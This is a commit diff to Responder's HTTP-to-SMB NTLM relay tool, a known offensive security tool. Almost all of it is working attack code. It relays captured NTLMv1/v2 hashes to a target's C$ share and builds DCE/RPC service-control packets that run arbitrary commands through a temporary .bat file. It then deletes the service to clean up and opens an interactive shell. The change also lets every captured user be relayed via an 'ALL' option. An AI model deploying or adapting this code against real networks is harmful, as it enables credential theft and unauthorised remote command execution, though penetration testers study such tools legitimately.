updated version number

settings.py

@@ -20,7 +20,7 @@ import subprocess
 
 from utils import *
 
-__version__ = 'Responder 2.3.2.5'
+__version__ = 'Responder 2.3.2.8'
 
 class Settings:
 	

tools/RelayHTTPSMB/HTTPRelayPacket.py

@@ -324,6 +324,7 @@ class SMBTreeConnectData(Packet):
         BccComplete    = str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
         self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]
 
+
 class SMBNTCreateData(Packet):
     fields = OrderedDict([
         ("Wordcount",     "\x18"),
@@ -352,7 +353,6 @@ class SMBNTCreateData(Packet):
         Data1= str(self.fields["FileName"])+str(self.fields["FileNameNull"])
         self.fields["FileNameLen"] = struct.pack("<h",len(str(self.fields["FileName"])))
         self.fields["Bcc"] = struct.pack("<h",len(Data1))
-
 class SMBReadData(Packet):
     fields = OrderedDict([
         ("Wordcount",     "\x0a"),
@@ -574,13 +574,12 @@ class SMBDCESVCCTLCreateService(Packet):
 
         File = "%WINDIR%\\Temp\\"+self.fields["FileName"]
         WinTmpPath = "%WINDIR%\\Temp\\Results.txt"
-        CleanService = "sc delete "+self.fields["ServiceName"]+"^&"#Start by deleting the service..then run the cmd.
-        FinalCMD = CleanService+"del /F /Q "+File+"^&"+self.fields["BinCMD"]+" ^>"+WinTmpPath+" >"+File
-        #That is: delete service we just ran, delete the bat file (it's loaded in memory, no pb), echo original cmd into random .bat file, run .bat file.
+        FinalCMD = "del /F /Q "+File+"^&"+self.fields["BinCMD"]+" ^>"+WinTmpPath+" >"+File
+        #That is: echo cmd into random .bat file, run .bat file, delete the bat file (it's loaded in memory).
         self.fields["FileName"] = ""#Reset it.
         self.fields["BinPathName"] = "%COMSPEC% /C echo "#make sure to escape "&" when using echo.
         self.fields["BinCMD"] = FinalCMD
-        self.fields["BintoEnd"] = "& %COMSPEC% /C "+File
+        self.fields["BintoEnd"] = "& %COMSPEC% /C "+File+" &exit"#make sure to exit when done.
         BinDataLen = str(self.fields["BinPathName"])+str(self.fields["BinCMD"])+str(self.fields["BintoEnd"])
 
         ## Calculate first
@@ -621,6 +620,17 @@ class SMBDCESVCCTLStartService(Packet):
         ("MaxCount",             "\x00\x00\x00\x00\x00\x00\x00\x00"),
     ])
 
+class SMBDCESVCCTLDeleteService(Packet):
+    fields = OrderedDict([
+        ("ContextHandle",        ""),
+    ])
+
+class SMBDCESVCCTLCloseService(Packet):
+    fields = OrderedDict([
+        ("ContextHandle",        ""),
+    ])
+
+
 class OpenAndX(Packet):
     fields = OrderedDict([
         ("Wordcount",             "\x0f"),
@@ -638,12 +648,11 @@ class OpenAndX(Packet):
         ("Reserved2",             "\x00\x00\x00\x00"),
         ("Bcc",                   "\x0b\x00"),
         ("Terminator",            ""),
-        ("File",                  "\\hola.txt"),
-        ("FileNull",              "\x00"),#00 00
+        ("File",                  "\\"),
+        ("FileNull",              "\x00"),
 
     ])
     def calculate(self):
-        #self.fields["File"] = self.fields["File"].encode('utf-16le')
         self.fields["Bcc"] = struct.pack("<h",len(str(self.fields["Terminator"])+str(self.fields["File"])+str(self.fields["FileNull"])))
 
 class ReadRequest(Packet):
@@ -662,7 +671,7 @@ class ReadRequestAndX(Packet):
         ("Wordcount",             "\x0C"),
         ("AndXCommand",           "\xff"),
         ("Reserved",              "\x00"),
-        ("AndXOffset",            "\xde\xde"),#
+        ("AndXOffset",            "\xde\xde"),
         ("FID",                   "\x02\x40"),
         ("Offset",                "\x00\x00\x00\x00"),
         ("MaxCountLow",           "\xf0\xff"),
@@ -849,8 +858,49 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host):
                             s.send(buffer1)
                             data = s.recv(2048)
 
+                            ## DCE/RPC SVCCTLDeleteService.
+                            if data[8:10] == "\x25\x00":
+                                if data[len(data)-4:] == "\x05\x00\x00\x00":
+                                    print "[+] Failed to start the service.\n"
+                                    return False
+                                head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+                                w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandler)
+                                x = SMBDCEPacketData(Opnum="\x02\x00",Data=w)
+                                x.calculate()
+                                t = SMBTransDCERPC(FID=f,Data=x)
+                                t.calculate()
+                                packet0 = str(head)+str(t)
+                                buffer1 = longueur(packet0)+packet0
+                                s.send(buffer1)
+                                data = s.recv(2048)
+
+                                ## DCE/RPC SVCCTLCloseService
+                                if data[8:10] == "\x25\x00":
+                                    if data[len(data)-4:] == "\x05\x00\x00\x00":
+                                        print "[+] Failed to delete the service.\n"
+                                        return False
+                                    head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
+                                    w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandler)
+                                    x = SMBDCEPacketData(Opnum="\x00\x00",Data=w)
+                                    x.calculate()
+                                    t = SMBTransDCERPC(FID=f,Data=x)
+                                    t.calculate()
+                                    packet0 = str(head)+str(t)
+                                    buffer1 = longueur(packet0)+packet0
+                                    s.send(buffer1)
+                                    data = s.recv(2048)
+
+                                    ##Close FID Request
+                                    if data[8:10] == "\x25\x00":
+                                       head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00")
+                                       t = CloseRequest(FID = f)
+                                       packet1 = str(head)+str(t)
+                                       buffer1 = longueur(packet1)+packet1  
+                                       s.send(buffer1)
+                                       data = s.recv(2048)
+
     ##Tree connect c$
-    if data[8:10] == "\x25\x00":
+    if data[8:10] == "\x04\x00":
 
        if data[len(data)-4:] == "\x05\x00\x00\x00":
            print "[+] Failed to start the service.\n"
@@ -937,3 +987,4 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host):
        return data
 
 
+

tools/RelayHTTPSMB/HTTPToSMBRelay.py

@@ -20,7 +20,7 @@ from Finger import RunFinger
 sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../../')))
 from socket import *
 
-__version__ = "0.2"
+__version__ = "0.5"
 
 def UserCallBack(op, value, dmy, parser):
     args=[]
@@ -55,7 +55,7 @@ def ShowWelcome():
     print '\n\033[1;34mResponder Proxy Auth to SMB NTLMv1/2 Relay 0.2\nSupporting NTLMv1 and NTLMv2.'
     print 'Send bugs/hugs/comments to: laurent.gaffie@gmail.com'
     print 'Usernames to relay (-u) are case sensitive.'
-    print 'To kill this script hit CRTL-C or <Enter>.\033[1;31m\n'
+    print 'To kill this script hit CRTL-C.\033[1;31m\n'
     print 'Use this script in combination with Responder.py for best results.'
     print 'Do not to use Responder.py with -P set. This tool does the same'
     print 'than -P but with cross-protocol NTLM relay. Always target a box ' 
@@ -127,7 +127,7 @@ def ParseHTTPHash(data, key, client):
 		WriteHash       = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, key.encode("hex"))
 		WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
                 print "[+] Received NTLMv1 hash from: %s"%(client)
-                if User in UserToRelay:
+                if User in UserToRelay or "ALL" in UserToRelay:
                         print "[+] Username: %s is whitelisted, fowarding credentials."%(User)
                         if ReadData("SMBRelay-Session.txt", client, User, HostName, Host[0], cmd=None):
                            return None, None
@@ -148,7 +148,7 @@ def ParseHTTPHash(data, key, client):
 		WriteHash      = '%s::%s:%s:%s:%s' % (User, Domain, key.encode("hex"), NTHash[:32], NTHash[32:])
 		WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
                 print "[+] Received NTLMv2 hash from: %s"%(client)
-                if User in UserToRelay:
+                if User in UserToRelay or "ALL" in UserToRelay:
                         print "[+] Username: %s is whitelisted, fowarding credentials."%(User)
                         if ReadData("SMBRelay-Session.txt", client, User, Domain, Host[0], cmd=None):
                            return None, None
@@ -264,7 +264,7 @@ def HTTPProxyRelay():
                               smbdata = s.recv(2048)
    	                      return smbdata, s, addr[0], Username, Domain
                            else:
-                              return None, None, None, None, None
+                              return None
 	    else:
                 Response = WPAD_Auth_407_Ans()
 	        conn.send(str(Response))
@@ -284,17 +284,17 @@ def RunPsExec(Host):
     data, s, clientIP, Username, Domain = GetCredentials
 
     if data[8:10] == "\x73\x6d":
-        print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target.\n[+] Hashes were saved anyways in Responder/logs/ folder."
+        print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n"
         Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
-
+        return False
     if data[8:10] == "\x73\x8d":
         print "[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n"
         Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
+        return False
 
     ## First, check if user has admin privs on C$:    
     ## Tree Connect
     if data[8:10] == "\x73\x00":
-        print "[+] Authenticated.\n"
         GetSessionResponseFlags(data)#Verify if the target returned a guest session.
         head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
         t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\C$")
@@ -306,7 +306,14 @@ def RunPsExec(Host):
 
     ## Fail Handling.
     if data[8:10] == "\x75\x22":
-        print "[+] Tree Connect AndX denied. SMB Signing is likely mandatory on the target, or this is a low privileged user.\n[+] Hashes were saved anyways in Responder/logs/ folder."
+        print "[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n"
+        Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
+        return False
+        return False
+
+    ## Fail Handling.
+    if data[8:10] == "\x75\xcc":
+        print "[+] Tree Connect AndX denied. Bad Network Name returned."
         return False
 
     ## Tree Connect
@@ -320,9 +327,9 @@ def RunPsExec(Host):
         s.send(buffer1)
         data = s.recv(2048)
 
-    ## NtCreateAndx
+    ## Go to NtCreateAndx
     if data[8:10] == "\x75\x00":
-        print "[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n"
+        print "[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n"
 
     while True:
         if data[8:10] == "\x75\x00":
@@ -376,3 +383,5 @@ if __name__ == '__main__':
     except:
         raise
 
+
+